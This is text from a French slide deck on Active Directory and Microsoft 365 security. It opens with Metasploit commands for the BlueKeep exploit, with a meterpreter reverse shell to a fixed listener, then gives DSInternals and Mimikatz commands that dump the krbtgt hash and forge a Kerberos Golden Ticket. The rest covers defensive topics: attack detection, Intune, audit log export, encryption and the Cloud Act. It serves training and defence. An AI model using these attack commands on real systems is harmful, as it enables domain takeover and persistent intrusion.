set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.140.127
set LPORT 4444
show targets
set target 6
exploit

Metasploit : exploitation de la faille Bluekeep
L’exploit actuel est en cours
d’amélioration.
A venir → un invite de
commande en tant que
System.

Mimikatz : élévation de privilèges

Générer un Golden Ticket - DSInternals
• Module PowerShell DSInternals :
• https://www.powershellgallery.com/packa
ges/DSInternals/2.16.1
• https://www.dsinternals.com/en/list-of-
cmdlets-in-the-dsinternals-module/
• Utilisation « standard » du protocole MS-
DRSR (Directory Replication Service (DRS)
Remote)
• Permet de lire / modifier le LMHASH et le
NTHASH d’un compte.
• Installation simplifiée (PowerShell V5) :
Install-Module DSInternals

Générer un Golden Ticket - DSINternals
• Avec DSInternals - domaine : idday.intra - contrôleur de domaine : iddaydc1.idday.intra
Taper la commande suivante : Get-ADReplAccount -SamAccountName krbtgt -Domain idday
-Server IDDAYDC1.idday.intra

Générer un Golden Ticket - Mimikatz
mimikatz.exe "privilege::debug" "kerberos::golden
/admin:administrator /domain:idday.intra /id:4000 /sid:S-1-5-21-
3891616466-275351861-3864161629
/krbtgt:118df50a41bca303945583ad11245fce /startoffset:0
/endin:600 /renewmax:10080 /ptt"

Sécuriser son annuaire Active Directory
G
• Mise en oeuvre
d’Azure ATP pour
détecter les
attaques.

Bloquer les machine non sûres avec Intune
• Créer une stratégie Intune
https://devicemanagement.microsoft.com/
• Sécurité du point de terminaison > Conformité de l’appareil >
Stratégie > Créer une stratégie

Restauration des documents OneDrive,
SharePoint et Teams
S

Protection contre les cryptolocker
• https://support.office.com/fr-fr/article/sauvegarder-vos-documents-images-et-
dossiers-de-bureau-avec-onedrive-d61a7930-a6fb-4b95-b28a-6552e77c3057
G

Architecte sans AD / serveur de fichiers / WSUS
• Pour les sociétés < 50 personnes :
• Azure AD comme annuaire d’entreprise et annuaire applicatif
• Intune comme alternative aux stratégies de groupe :
https://oliverkieselbach.com/2019/07/18/intune-policy-processing-on-windows-
10-explained/
• SharePoint Online / OneDrive for Business comme alternative aux serveurs de
fichiers - SharePoint Migration tools : https://docs.microsoft.com/en-
us/sharepointmigration/fileshare-to-odsp-migration-guide
• Windows Update for Business / Delivery Optimization comme alternative à WSUS
• Autopilot comme alternative aux outils de déploiement / master
• TeamViewer comme outil de prise en main à distance avec interface Intune :
https://www.teamviewer.com/fr/integrations/microsoft-intune

Architecte sans AD / serveur de fichiers / WSUS
2 portail d’administration pour Intune :
Via le portail Azure AD (Devices et Intune) : https://portal.azure.com
Le portail Microsoft Endpoint Manager admin center : https://devicemanagement.microsoft.com/#home

En résumé
• Sans EMS :
• Sécurisation de son annuaire Active Directory
• Outils tiers de détection d’attaque comme Alsid for AD (payant).
• Avec EMS :
• Azure ATP / ATA (équivalent On-Premise).
• Intune pour forcer les machines à être conforme
• Pour les sociétés < 50 personnes : Azure AD Join + Intune + Office 365 (plus
d’AD et de serveurs de fichiers).

156
Incident #8
Suivi et anticipation

Export des logs Exchange Online
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -LogonTypes
Owner -StartDate 1/1/2019 -EndDate 1/1/2020 -ResultSize 2000 –ShowDetails
PS > Search-MailboxAuditLog -Identity <monuser@consoto.com> -StartDate
$([datetime]::Now.AddDays(-90) -EndDate $([datetime]::Now) –ShowDetails -
ResultSize 2000 | Export-Csv –NoTypeInformation –Path
".MonExportMailBox$(Get-Date -Format 'yyyyMMddhhmmss').csv"

Export des logs O365
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Export Excel limité à 50K events, 3K chars
PS > $beginDate = [datetime]::Now.AddDays(-90)
PS > $endDate = [datetime]::Now
PS > $sessionId = "FullExport$(Get-Date -Format 'yyyyMMddhhmmss')”
PS > Do {
$tempResult = Search-UnifiedAuditLog -StartDate $beginDate -EndDate $endDate
-ResultSize 1000 -SessionId $sessionId -SessionCommand ReturnLargeSet
$resultSet += $tempResult
} Until ($tempResult.Count -eq 0)
PS > | Export-Csv –NoTypeInformation –Path ".MonExportMailBox$(Get-Date -
Format 'yyyyMMddhhmmss').csv"

La sauvegarde des données
• Stratégie de sauvegarde : réplication de la données sur plusieurs
centre de données + rétention des données supprimées.
• Sauvegarde Microsoft : 2 fois par jour avec rétention 14 jours (sans
garantie Microsoft).
• Pour retrouver des données supprimer à plus de 14 jours :
Utiliser un outil tiers comme Veeam Backup For Office 365.

Se tester avec le Secure Score
• https://security.microsoft.com/securescore

En résumé
• Sans EMS :
• Export et sauvegarde des logs
• Sauvegarder votre tenant Office 365 avec un outil tiers.
• Evalualer son niveau de sécurité avec le secure score

Customer LockBox
• Nécessite licence O365 E5
• Validation de toute action du support
Microsoft aux données Exchange /
SharePoint et OneDrive
• Accès de 12h par défaut
• Tenant admin > Settings >
Security and Privacy>
Customer LockBox

Localisation
• Multi geo capability
(500 users min.
2$/users/mmois)
• Data center FR

Où sont les miennes
• Tenant administration > Paramètres > Profil de l’organisation
PS > Connect-MsolService
PS > (Get-MsolCompanyInformation).AuthorizedServiceInstances

Où sont les miennes?

Chiffrement des communications
• Communications internes O365 : TLS ou IPSec
• Communication O365/client : TLS (SHA 256, clé publique 2048 bits)

Chiffrement au stockage
• 1 ou plusieurs Blobs dans plusieurs Azure Storage (max 64Ko)
• Une clef de chiffrement par fichier (AES 256bits)
• Clefs stockées chiffrées dans la base de données SharePoint qui contient aussi la
carte pour retrouver les Blobs
• Clef de déchiffrement des containers
Azure storage et des clefs dans la base de
données SharePoint dans le Key Store
(ou Azure Key Vault si BYOK)
• Conformité du chiffrement avec FIPS 140-2
• SharePoint DB dans Azure SQL Database elle-même chiffrée par Transparent
Data Encryption
• Disques durs chiffrés par BitLocker

Normes
• Nombreuses normes
• Habilitation Hébergeur
de données de santé FR
• Audit extérieurs
• Accès aux documents
d’audit

Accès aux documents d’audit externes
• https://servicetrust.microsoft.com/
• White papers
• Rapports pen test
• Audits

RGPD
• Contrat compatible
• Nombreuses fonctionnalités pour
conformité (eDiscovery, RMS,
Etiquettes, DLP, etc.)

Télémétrie
• Envoie de données de télémétrie à Microsoft (Office Pro Plus est un
« third party tool » dans les conditions générales de vente)
• Auditable via la Visionneuse de
Données de Diagnostic
• Mise à jour des conditions de ventes
Q1 2020

Patriot Act / SCA
• S’applique uniquement aux données
stockées ou transitant sur sol US
• Patriot Act -> FBI, CIA, NSA, Armée
• SCA -> Justice
• Microsoft a tenu tête des années au DoJ
sur l’extra territorialité du SCA (Stored
Communication Act) jusqu’à la cours
Suprême des USA (cf. Cloud Act plus tard)

Cloud Act
• Sur requête d’un procureur américain (ex:
corruption, commerce avec pays sous embargo)
• Applicabilité extra territoriale
• Si accord bilatéral, opposition de l’hébergeur sous
14 jours possible si :
• Citoyen non américain
• ET va à l’encontre de la législation locale
Conditions générales de vente O365
“Si Microsoft est contrainte de divulguer des Données Client ou des Données à Caractère Personnel aux
pouvoirs publics, elle s’engage à en aviser le Client dans les meilleurs délais et à fournir un exemplaire de
la demande, sauf interdiction légale.”

176
Et si j’ai juste 5
minutes?

Sécurité si vous démarrez de zero un tenant
• Admin MFA
• Users MFA
• Désactivation des
protocole legacy
• MFA pour actions à
privilège
• C’est le futur des
paramètres par
défaut Microsoft
sous 5 ans

Buy some remote consulting!
Acheter des journées de conseil à distance !
https://modern-workplace.pro/mwcp-sebastien-paulet

Meetup gratuit Mardi soir (sur inscription)

Get sessions slide deck
and information from sponsors
Or click the link

MWCP19 Cybersécurité et M365 en action

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

Similaire à MWCP19 Cybersécurité et M365 en action

Similaire à MWCP19 Cybersécurité et M365 en action (20)

Plus de Sébastien Paulet

Plus de Sébastien Paulet (20)

Dernier

Dernier (9)

MWCP19 Cybersécurité et M365 en action